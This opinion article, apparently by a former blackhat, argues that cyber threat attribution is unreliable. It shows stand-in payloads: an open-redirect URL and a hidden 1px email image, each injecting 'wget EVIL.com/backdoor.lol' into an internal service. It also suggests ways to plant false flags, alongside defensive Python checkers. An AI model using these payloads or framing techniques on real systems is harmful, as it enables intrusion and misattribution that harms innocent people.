False Flags In Threat Attribution

The entire concept of threat attribution is tremendously flawed, argues security researcher Matt Telfer. In this article we take a closer look at false flags.

This may come as no surprise to some, but the entire concept of threat attribution, especially with regard to attacks committed by APT (Advanced Persistent Threat) groups, is (in my humble opinion and that of many others) tremendously flawed. Despite this, threat attribution is often regarded as fact set in stone, or at least as somewhat solid evidence. The truth is that nobody can really know.

Attribution is nothing more than mindless speculation, for the most part connecting dots that don't necessarily exist. Can threat attribution be relied upon whatsoever?

Is there a more proactive approach available? Was that insider breach really just an insider breach? Did Russia really hack the DNC? After reading this, you may begin to question whether that news article you just read about the newest cyber-attack was truly accurate. Of course, not all threat attribution is inaccurate, just (once again, in my opinion) the vast majority of it. Within this post I'll be explaining some methods that could potentially be used by government-backed threat actors to plant false flags in web-based attacks.

Attributing a threat to an individual can be easy, but when you're a Law Enforcement Agency or Government Organization attempting to attribute a threat to an entire country, things get a lot more complicated.

Within this article I am going to attempt to break down why threat attribution (in its current state) is of very little real use, and can more often than not lead to false accusations. In doing so, I will be sharing technical examples to demonstrate how a threat could be attributed to an innocent victim (or even a country!).

If you’re into threat intelligence, then it’s more than likely that you’re aware of the fact that APT groups will attempt false flags or use tactics to mislead the investigation into the data breach or network intrusion.

You may expect this to be the case only with malware or exploits used by these groups (an example that comes to mind is one APT group emulating the malware writing style of another, something commonly seen in the wild). What you may not be aware of is that a hacker could compromise an entire company and make it appear to the authorities that it was merely an insider breach.

Meanwhile, the hacker is in the clear. In some cases, false evidence can be planted in what looks like an open-and-shut case, when in reality it could be a hacker who’s done a very good job of covering their tracks and planted evidence on the machine of someone who would be considered a prime candidate as an initial suspect. To begin the analysis of the many inconsistencies associated with threat attribution, I’ll start with the “Insider Breach” theory.

The Insider Breach Theory

In the case of an (alleged) insider breach, there are always the glaringly obvious explanations as to how whoever is blamed could be innocent. For instance, another employee could have committed the deed while the accused left their desk unattended (without security footage to corroborate this, such a claim from the accused could result in plausible deniability, causing a case to be dropped in the absence of any solid evidence). What I’m going to be covering, though, are some less obvious reasons why the attribution of cyber-threats is at best highly questionable, and at worst completely unreliable.

Take the following scenario for example: Company “X” used Software “Y” on their public-facing webserver, and Software “Z” on their internal network.

A hacker could determine this through some initial recon, and by no means would they need internal access. Now, let’s assume that Software Y (running on Company X’s public website) contained an Open Redirect vulnerability, and that Software Z (used internally) contained a vulnerability (or even functionality) which allowed access to the user database. The hacker has performed some initial reconnaissance, which in itself may leave no trace whatsoever.

They could simply Google the software used by the website. To find out what internal software is in use, they could do something like look at the available job listings at Company X, and right there: “Experience with Software Z”. Now the attacker Googles Software Z. From this information, they’ve come to the conclusion that an open redirection vulnerability exists within Software Y, and that an otherwise unreachable vulnerability exists within Software Z (due to it being on the internal employee network). For the sake of this example, let’s pretend that Software Z is running on port ‘1337’ within the internal network.



Now throw user interaction into the mix. Let’s assume that the hacker has a way to directly interact with an employee that they know is going to be authenticated on the internal network – an example of this could be through a phishing email to a mail account that an employee can only access from within their network, or through a live chat support system where an employee is likely to click a “trusted” link since it’s their own site after all, so it must be trustworthy, right?! What if a hacker were to craft a payload like this?

http://company-X.com/Software-Y/VisitExternalSite?site=http://127.0.0.1:1337/Software-Z/path/to/vuln.ext?input=;wget%20http://EVIL.COM/backdoor.lol

So, for anyone who isn’t quite following, here’s what’s potentially going on:

- The hacker does some generic (passive) recon and scopes out the site. No traces of any recon being performed.

- Using this information, the hacker knows that there is a major vulnerability within the internal network which they don’t have access to.

- The hacker utilizes a vulnerability within the company’s web application, and crafts a payload.

- The hacker interacts with the employee in some way, and the employee is redirected to the vulnerable application on their internal network.

- Vulnerable application is hit with a payload, coming directly from the employee’s machine.

- The hacker now has a backdoor on the company’s internal network, and upon initial investigation, the employee seems entirely guilty.
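From the defender's side, the redirect step in the chain above is at least checkable. Here is a minimal sketch in Python, assuming the redirect destination travels in a query parameter named `site` (as in the example payload). The function names are my own and purely illustrative, and the check only recognises IP literals and `localhost`, so a DNS name that resolves to an internal address would slip straight past it.

```python
import ipaddress
from urllib.parse import unquote, urlsplit


def is_internal_host(host):
    """Return True for localhost or a loopback/private/link-local IP literal."""
    if host is None:
        return False
    if host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: this sketch does not resolve it, so it is not flagged.
        return False
    return addr.is_loopback or addr.is_private or addr.is_link_local


def redirect_target(url, param="site"):
    """Extract the redirect destination from the named query parameter."""
    query = urlsplit(url).query
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == param:
            return unquote(value)
    return None


def redirect_points_inward(url, param="site"):
    """True when the redirect destination is an internal address."""
    target = redirect_target(url, param)
    if target is None:
        return False
    try:
        host = urlsplit(target).hostname
    except ValueError:
        # Malformed destination: not classified by this sketch.
        return False
    return is_internal_host(host)


if __name__ == "__main__":
    payload = (
        "http://company-X.com/Software-Y/VisitExternalSite"
        "?site=http://127.0.0.1:1337/Software-Z/path/to/vuln.ext"
        "?input=;wget%20http://EVIL.COM/backdoor.lol"
    )
    print(redirect_points_inward(payload))
```

A check like this would not prove who was behind a request, but it shows that a public-facing redirect pointing back into the internal network can be spotted in web server logs, which is exactly the kind of detail a rushed investigation might never look for.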

Now, Open Redirection is by no means the only stager for a payload to allow a hacker to exploit a previously unreachable or unattainable vulnerability. There’s Cross-Site Scripting, Cross-Site Request Forgery, all different forms of session-based attacks that would allow an attacker to hijack an employee’s session, and a whole array of other related attack vectors which could yield the same end result.

Many of these exploits would allow an authenticated employee to be targeted without any direct interaction from the hacker, for example by means of a watering-hole attack. (Blind XSS would be another example, although this would leave a trace unless the hacker took extra measures to cover their tracks.)

If a hacker were to further expand their recon scope, and, for example, look into the social media accounts of employees, then they could abuse the likes of an XSS or CSRF vulnerability in a site that they had determined their victim visited on a regular basis, causing the employee to make that request from their machine. What if the mail client that the employee uses allows HTML to be embedded? A hacker could just add something like this to the contents of a legitimate looking email:

<img src="http://127.0.0.1:1337/Software-Z/path/to/vuln.ext?input=;wget%20EVIL.com/backdoor.lol" alt=" " width="1px" height="1px" />

From within their office, the employee of Company X opens an email. They’ve been warned not to download attachments, so they don’t. They read the contents of the email, and come to the conclusion that it’s spam (or a hacker could even send a spoofed email from an email address associated with the company itself).

Meanwhile, the employee is unwittingly making a request to “Software Z”, their internal service which happens to be vulnerable. They are delivering the payload by reading their email. Nothing would seem out of the ordinary. After all, who’s going to notice a 1px by 1px image on their screen? How attentive would you have to be to notice that a single pixel on your screen looks slightly different from the other pixels? Depending on how thorough the investigation is, the employee is going to look guilty – unless they noticed some inconsistencies with a strange email they got… speaking of which, this entire scenario could be used in reverse.
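An investigator who does get hold of that strange email could look for exactly this pattern. The following is a rough sketch using only Python's standard library. The class and function names are hypothetical, and it assumes the email's HTML body has already been extracted as a string. It flags `<img>` tags whose source is an internal address or whose dimensions are one pixel or less.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit


def is_internal_host(host):
    """Return True for localhost or a loopback/private/link-local IP literal."""
    if host is None:
        return False
    if host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # DNS names are not resolved in this sketch
    return addr.is_loopback or addr.is_private or addr.is_link_local


def is_tiny(value):
    """True when a width/height attribute is 0 or 1 pixel (e.g. "1" or "1px")."""
    if value is None:
        return False
    text = value.strip().lower()
    if text.endswith("px"):
        text = text[:-2].strip()
    return text in {"0", "1"}


class ImageAuditor(HTMLParser):
    """Collects suspicious <img> tags as (src, reasons) tuples."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attr = dict(attrs)
        src = attr.get("src") or ""
        reasons = []
        try:
            host = urlsplit(src).hostname
        except ValueError:
            host = None  # malformed URL: skip the address check
        if is_internal_host(host):
            reasons.append("src targets an internal address")
        if is_tiny(attr.get("width")) and is_tiny(attr.get("height")):
            reasons.append("image is at most 1x1 pixel")
        if reasons:
            self.findings.append((src, reasons))


def audit_email_html(html):
    """Return a list of suspicious images found in an HTML email body."""
    auditor = ImageAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings
```

Finding such a tag would support the employee's version of events, but as the next point shows, it would not settle the question of who actually planted it.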

An employee could (with the right operational security) make it appear as though they were the innocent target of an attack such as this, referencing a strange email they received as the possible cause. Sure, they may lose their job, but they aren’t necessarily going to be considered a suspect for an insider breach. Instead, they’re going to be considered the innocent victim of an external attack.

That poor employee! Sure, if the authorities dug deep enough then maybe they’d find out the truth, but if they’re given an easy explanation which seems completely plausible, then why not roll with it? After all, who likes paperwork?

What if someone wanted to make an organization look like it was responsible for an attack against another organization? What if that organization was a government organization, and the victim another government? Although this could be done via some of the methods described above (for example, injecting JavaScript into the browser of an organization’s employee, then having it execute a payload to launch a cyber-attack against another organization), one technique that has emerged over the last few years is Server-Side Request Forgery (SSRF).

I’ll offer a basic explanation of how this vulnerability works, so that those who aren’t well-versed in web application security can understand how it could easily be used to attribute an attack to an organization that played no role whatsoever in the attack (other than happening to be vulnerable).
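To make the attribution problem concrete, here is a toy model in Python. It involves no real networking, and every name and address in it is hypothetical (the IPs come from the ranges reserved for documentation). It assumes the vulnerable organization runs some feature that fetches a resource on a user's behalf without validating the destination, and it simply records which source address each party would see in its logs.

```python
class Host:
    """A toy server that records the source address of every request it sees."""

    def __init__(self, name, ip):
        self.name = name
        self.ip = ip
        self.access_log = []

    def handle(self, source_ip, path):
        self.access_log.append((source_ip, path))
        return f"{self.name} handled {path}"


class VulnerableHost(Host):
    """A host with a hypothetical 'fetch this for me' feature and no validation."""

    def fetch_on_behalf(self, client_ip, target, path):
        # The vulnerable host's own log does record the real client...
        self.access_log.append((client_ip, f"/fetch?host={target.name}&path={path}"))
        # ...but the outbound request carries the vulnerable host's address.
        return target.handle(self.ip, path)


def simulate():
    """Run one forged request and return (middleman_log, victim_log)."""
    attacker_ip = "203.0.113.66"                           # hypothetical attacker
    org_a = VulnerableHost("org-a.example", "198.51.100.20")  # vulnerable middleman
    org_b = Host("org-b.example", "192.0.2.10")              # eventual victim
    org_a.fetch_on_behalf(attacker_ip, org_b, "/admin/export")
    return org_a.access_log, org_b.access_log


if __name__ == "__main__":
    middleman_log, victim_log = simulate()
    print("victim sees:", victim_log)
    print("middleman sees:", middleman_log)
```

In this model the victim's log contains only the vulnerable organization's address. The attacker's address exists in exactly one place, the middleman's log, and the victim's investigators may never get to see it (or it may already have been wiped).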

Look at the DNC hack. Evidence it was the Russians? They “forgot to turn on their VPN” and connected from an IP address in Moscow. Who’s to say that this wasn’t an intentional false flag in order to shift the blame towards Russia? Sure, there was other evidence pointing to Russia (such as Guccifer 2.0's lies about being Romanian). I'm not saying that it wasn't Russia, but what happened to the entire concept of “innocent until proven guilty”? Shoddy attempts at threat attribution are by no means proof; hell, they’re barely even circumstantial evidence.

This could have easily been an elaborate false flag. Who’s to say it wasn’t just some middle-aged man sitting in his mom’s basement, desperately hoping for Trump to win the election? All he would have to do is hack a machine in Moscow, proxy his connection through it, and then “forget” to turn on his VPN one day: an IP address from Moscow gets leaked, case closed. Even if Guccifer 2.0 or the alleged DNC hacker(s) were Russian, who’s to say the Government had any involvement whatsoever? Russia has some of the most talented civilian hackers on the internet. Maybe some geek in Russia was just pro-Trump. Who knows?

The authorities will attempt to connect the dots by looking at the modus operandi of APT-Level groups, to check for repetitive techniques in use or a consistent style of coding. Thanks to threat intelligence firms, much of this information is public, allowing a somewhat competent hacker to emulate the style of a documented APT group. Theoretically, I could hack some random Chinese educational institution or government website, then – from their servers – launch a cyber-attack against the UK Government. Upon initial investigation, the authorities will assume that the Chinese Government has targeted the UK Government.

You may be thinking it would be hard to mimic the modus operandi of a government-backed hacking group, but considering the vast majority of “APT-Level” breaches have been the result of spear phishing attacks, how hard would it really be? There are freely available malware samples online for security researchers to analyze, purportedly written by APTs. One could mimic the coding style of such samples (let’s use China as an example), then, to throw the authorities off even more, write some comments in the malware in Russian.

False flags 101. Once the authorities found this, they’d see the comments in Russian, while noticing that the deployed malware was written in the style of a documented Chinese APT group. To the authorities, they’ve just made a breakthrough. It can’t be Russia, it was China using a false flag to attempt to throw them off! Because it most certainly couldn’t just be some random teenager, right?!

As a former blackhat, I know a fair amount about utilizing false flags to throw the authorities off your trail (although in the end I did get caught; that’s what usually happens when you’re a teenage hacker). There were a variety of methods that I employed in order to attempt to deceive the authorities, and they weren't just effective against the authorities, but also against other hacking groups.